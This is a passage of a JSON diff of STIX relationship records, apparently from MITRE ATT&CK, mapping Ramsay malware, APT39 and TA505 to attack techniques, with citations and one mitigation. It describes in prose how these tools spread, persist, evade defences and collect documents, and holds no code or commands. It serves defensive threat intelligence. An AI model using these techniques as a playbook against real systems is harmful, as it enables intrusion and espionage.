+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can scan for systems that are vulnerable to the EternalBlue exploit.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2c9fad15-9b3f-45fe-854a-c87113d4695c",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.545Z",
+ "created": "2020-05-28T16:38:03.660Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can detect system information to create a hardware profile GUID which acts as a system identifier for operators.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--81a857bb-4c36-4875-a62e-30e7b12eae12",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.600Z",
+ "created": "2020-05-28T16:38:03.684Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can scan for network drives which may contain documents for collection.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--0428220b-eb98-45c3-a637-7da54b4496b4",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.056Z",
+ "created": "2020-05-28T16:38:03.686Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can compress and archive collected files using WinRAR.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--756f3884-c21b-4d00-ac2c-6c2ab386072f",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.086Z",
+ "created": "2020-05-28T16:38:03.688Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can stage data prior to exfiltration in %APPDATA%\\Microsoft\\UserSetting and %APPDATA%\\Microsoft\\UserSetting\\MediaCache.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--4b03f718-f89a-4652-b3be-5cbe4e0e044f",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.124Z",
+ "created": "2020-05-28T16:38:03.701Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can scan for Microsoft Word documents within the target's filesystem.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--cde9af4e-4bf9-4235-9d27-496eb78e3608",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.130Z",
+ "created": "2020-05-28T16:38:03.703Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a6046634-68c8-4a9e-a58f-58fd8876346a",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:05.032Z",
+ "created": "2020-05-28T16:38:03.706Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can collect Microsoft Word documents from the target's filesystem.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--3feb6e83-0491-4e3d-a581-3f68ab839e92",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.175Z",
+ "created": "2020-05-28T16:38:03.710Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can scan for removable media which may contain documents for collection.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--55d84559-7bb9-4e17-be60-7694e4219877",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.170Z",
+ "created": "2020-05-28T16:38:03.712Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--55e67f6b-600a-4196-b497-63019731e66e",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.651Z",
+ "created": "2020-05-28T16:38:03.754Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on removable drives.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c8f639f8-9717-485a-ad4c-7eb1fc771691",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.213Z",
+ "created": "2020-05-28T16:38:03.757Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has included embedded Visual Basic Scripts in malicious documents.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d9898b1f-9056-400c-9b26-26c87500cfe3",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.222Z",
+ "created": "2020-05-28T16:38:03.760Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can use the Windows COM API to schedule tasks and maintain persistence as well as the WriteFile, CloseHandle, and GetCurrentHwProfile functions during collection.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--239eb918-b9e0-499c-9934-96382fa782a0",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.753Z",
+ "created": "2020-05-28T16:38:03.762Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has base64-encoded its portable executable and hidden itself under a JPG header. [Ramsay](https://attack.mitre.org/software/S0458) can also embed information within document footers.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e273286f-8ca7-4d3e-bdc3-08929c7cbd12",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.743Z",
+ "created": "2020-05-28T16:38:03.764Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can schedule tasks via the Windows COM API to maintain persistence.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--417912a3-95a8-4dd4-a586-88cca62f3ebc",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:05.094Z",
+ "created": "2020-05-28T16:38:03.767Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has been delivered using OLE objects in malicious documents.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--0709589f-cc25-4925-89be-59e121c47951",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.261Z",
+ "created": "2020-05-28T16:38:03.769Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can insert itself into the address space of other applications using the AppInit DLL Registry key.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f96794d1-0707-4897-9de1-08546b605bf0",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.720Z",
+ "created": "2020-05-28T16:38:03.771Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has included a rootkit to evade defenses.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2962304a-f96e-4323-958f-f685eae97ac6",
+ "type": "relationship",
+ "modified": "2020-05-28T16:38:03.774Z",
+ "created": "2020-05-28T16:38:03.774Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has been embedded in documents exploiting CVE-2017-0199 and CVE-2017-11882.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--76a3097b-808d-45a9-aa81-dce5ed6a45d3",
+ "type": "relationship",
+ "modified": "2020-05-28T16:38:03.775Z",
+ "created": "2020-05-28T16:38:03.775Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on networks shared drives.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--365f82e7-6fad-44a7-855d-955d4307920f",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.263Z",
+ "created": "2020-05-28T16:38:03.777Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a 7zip installer.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--882002ca-25a6-4226-9cc4-3efe5f798449",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:05.155Z",
+ "created": "2020-05-28T16:38:03.779Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used a tool named mfevtpse.exe to proxy C2 communications, closely mimicking a legitimate McAfee file mfevtps.exe.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d7a244fa-f52c-4e54-9088-6f9ccda8b2b9",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.170Z",
+ "created": "2020-05-29T14:02:52.170Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--e3388c78-2a8d-47c2-8422-c1398b324462",
+ "target_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530",
+ "external_references": [
+ {
+ "source_name": "Microsoft Protected Users Security Group",
+ "url": "https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group",
+ "description": "Microsoft. (2016, October 12). Protected Users Security Group. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "Consider adding users to the \"Protected Users\" Active Directory security group. This can help limit the caching of users' plaintext credentials.(Citation: Microsoft Protected Users Security Group)",
+ "relationship_type": "mitigates",
+ "id": "relationship--6c1da818-6e35-4fa8-ad40-e45c2c90e016",
+ "type": "relationship",
+ "modified": "2020-05-29T16:34:40.452Z",
+ "created": "2020-05-29T16:34:40.452Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has executed commands using cmd.exe.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fee6aca0-dcb7-43b4-a253-66913620631a",
+ "type": "relationship",
+ "modified": "2020-06-15T22:05:43.295Z",
+ "created": "2020-05-29T19:02:06.766Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "tool--03342581-f790-4f03-ba41-e82e67392e23",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c5be8127-669e-49b9-b603-581e3498d203",
+ "type": "relationship",
+ "modified": "2020-05-29T19:02:07.052Z",
+ "created": "2020-05-29T19:02:07.052Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aae22730-e571-4d17-b037-65f2a3e26213",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[ServHelper](https://attack.mitre.org/software/S0382) has the ability to execute a PowerShell script to get information from the infected host.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8982affe-fe2b-40c8-8b0c-e539687f4124",
+ "type": "relationship",
+ "modified": "2020-05-29T19:31:03.872Z",
+ "created": "2020-05-29T19:31:03.872Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used fast flux to mask botnets by distributing payloads across multiple IPs.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--53356453-2cf1-46d9-ac8f-77fc3a2274d9",
+ "type": "relationship",
+ "modified": "2020-06-17T19:18:13.843Z",
+ "created": "2020-05-29T20:09:48.844Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
